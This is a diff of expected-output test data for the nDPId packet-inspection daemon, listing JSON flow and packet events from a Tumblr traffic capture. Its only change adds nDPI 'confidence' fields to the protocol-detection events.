 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2849,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605292108917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292108917,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1Md4lVGgBAB+8BsAAABAQgKBcmoXMLdrGc="}
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292114506,"flow_last_seen":1605292114506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292114506,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605292114506,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292114506,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iknWH70O\/fgBATex8tAAABAQgKqXtvnsLdEcs="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12580,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292114736,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvQ79+YpJ1igBBY1dkNAAABAQgKwt3C3al6v1A="}
@@ -152,11 +152,11 @@
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605292121486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292121486,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+osAAAAAoAL9IJMMAAACBAWgBAIICpi1TMUAAAAAAQMDBw=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23416,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292121507,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAEpymhYqAcsBIEmLB5kd7IUo3\/YpAbupQGb5NYUDXPqMoBJXgPvWAAACBAV4AQMDAwQCCArC3d2UmLVMxQ=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23417,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292121507,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+oxm+TWGgBAB+3\/SAAABAQgKmLVM28Ld3ZQ="}
-00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121674,"flow_last_seen":1605292121674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292121674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605292121674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292121674,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v36ZlfzugBAB9Zh5AAABAQgKG7m2dMLdLYw="}
-00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}}
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01279{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605292121698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292121698,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgXAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvZCJmV\/O79d79\/gBALlo7gAAABAQgKwt3eUxu5BaQ="}
 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122064,"flow_last_seen":1605292122064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605292122064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605292122064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292122064,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGkAAAAAoAL9IOE8AAACBAWgBAIICthbOh0AAAAAAQMDBw=="}
@@ -164,109 +164,109 @@
 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23634,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605292122076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAE4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2QjVsejoTgBgk6YPXAAABAQgKJEeQFMLc4vQXAwMAKQAAAAAAAAAQ4G\/3mQ3kGgQra1eBqPYCTvM1QPmaUoG2gBnwdZPdmFLU"}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23650,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292122094,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBjCTTL5FAHmhqoBJXgI\/cAAACBAV4AQMDAwQCCArC3d\/Z2Fs6HQ=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23654,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292122094,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGok0y+SgBAB+xPQAAABAQgK2Fs6O8Ld39k="}
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122095,"flow_last_seen":1605292122095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605292122095,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605292122095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292122095,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5CzgAAAAAoAL9IPiAAAACBAWgBAIIChLBJ8gAAAAAAQMDBw=="}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24118,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292122163,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuW0O3zbp+IuQs5oBJXgJ7NAAACBAV4AQMDAwQCCArC3d\/9EsEnyA=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24126,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292122163,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5Cznt826ggBAB+yKbAAABAQgKEsEoDMLd3\/0="}
